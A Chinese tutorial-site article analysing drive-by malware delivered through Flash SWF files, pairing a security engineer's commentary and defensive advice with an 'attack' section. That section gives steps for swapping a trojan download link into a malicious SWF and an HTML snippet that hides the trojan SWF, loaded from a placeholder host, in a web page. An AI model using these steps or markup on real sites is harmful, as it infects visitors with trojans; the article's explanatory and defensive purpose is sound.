萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 利用Flash軟件漏洞的SWF掛馬方式剖析與防范

利用Flash軟件漏洞的SWF掛馬方式剖析與防范

  SWF掛馬出現得比較早,以前主要是利用系統漏洞傳播,這種方式跟很多掛馬方式相差無幾,所以並不出眾。直到利用Flash軟件漏洞的SWF掛馬方式出現後,才迅速躥紅,成為主流的掛馬方式之一。為什麼利用Flash軟件漏洞的SWF掛馬方式會這麼厲害呢?下文將一一解答。

  金山李鐵軍:資深安全工程師,有十余年反病毒經歷。
  SWF掛馬的危害性很大,為什麼這麼說呢?它有兩個優勢:第一個優勢是,使用SWF文件格式的Flash有著龐大的安裝量,用戶基數大,潛在的可能被黑的用戶量就大。每當Flash新漏洞一出現,SWF掛馬就會沉渣泛起。
  第二個優勢就是,播放SWF文件是很正常的行為,不會引起用戶的警覺,這樣掛馬的隱蔽性就會非常高。當然,這種掛馬方式的缺點也非常明顯,在大多數用戶安裝了補丁後,成功率就會大大降低。

  安全百科:SWF是Adobe Flash在網絡中播放時使用的文件格式,也是動畫制作完成後生成的最終格式。Flash的普及程度相當高,絕大部分的網友為了浏覽SWF文件而安裝它。

  揭示SWF掛馬優勢

  為什麼黑客會鐘情SWF掛馬呢?因為SWF文件對應的Flash動畫播放軟件是裝機必備的標准軟件之一,如果能夠挖掘到Flash中的漏洞,再配合網頁進行掛馬,自然會肉雞成群。此外,許多人會定期更新Windows的補丁,但是常用軟件卻很少進行更新,這就造成了Flash這樣的漏洞受到黑客的追捧與歡迎。

  黑客選擇使用Flash的SWF文件掛馬,就如同以前的毒奶粉事件一樣,雖然消費者都很信任正規廠商的奶粉,避免通過其他渠道購買奶粉。但是真奶粉由於自己的質檢漏洞等問題,導致了奶粉中含有有毒成分,最終毒害了消費者。

  Flash動畫也是如此,很多用戶相信Flash,都會進行安裝,但是由於Flash播放控件也存在漏洞,導致用戶雖然安裝了無毒的Flash控件,但是一樣會遇到利用Flash控件漏洞掛馬的網頁。

  安全八卦:Flash漏洞曝光後,雖然補丁程序及時發布了,但是仍然有數百萬台沒有及時更新安全補丁的電腦被植入木馬。此外,一些惡意網站也趁火打劫,不管訪問者是否更新了安全補丁,都要求更新網站提供的所謂的安全補丁,其實是病毒。

  SWF掛馬攻防實錄

  攻主流的SWF掛馬都是通過Flash漏洞實現的。黑客下載一個惡意的SWF文件,用寫字板打開,找到EXE文件鏈接的地址。黑客只需要將該鏈接地址修改成自己指定的木馬下載地址,再上傳到網站即可。

  在需要掛馬的網頁中插入:

  <DIV style="POSITION: absolute;left: 00px">
  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="700" height="500">
  <param name="movie" value="http://www.xxx.com/MuMa.swf SWF木馬網址">
  <param name="wmode" value="transparent">
  <embed src=" http://www.xxx.com/MuMa.swf SWF木馬網址" type="application/x-shockwave-flash">
  </embed>
  </object>
  </DIV>

  此外,黑客還可以使用SWF木馬生成器來掛馬。在生成器中輸入自己指定的木馬下載地址,然後點擊“生成”按鈕,將生成惡意的SWF文件插入需要掛馬的網頁中。

  防安全工程師在處理SWF掛馬時,首先升級Flash的版本,打上相關的安全補丁,堵住安全漏洞,並會使用一些監控工具,監控公司客戶機常用軟件的升級情況。此外,還可以使用一些能攔截網頁掛馬的安全輔助工具等。

  安全八卦:由於Flash漏洞的危害性,當漏洞利用程序出現時,在黑客圈甚至被炒到數萬元,但仍不乏購買者。與此同時,Flash漏洞的曝光,也讓黑客圈內的肉雞交易再次火爆,在黑客常用的IRC聊天頻道中,肉雞以數千甚至上萬的數量進行批量交易。

copyright © 萬盛學電腦網 all rights reserved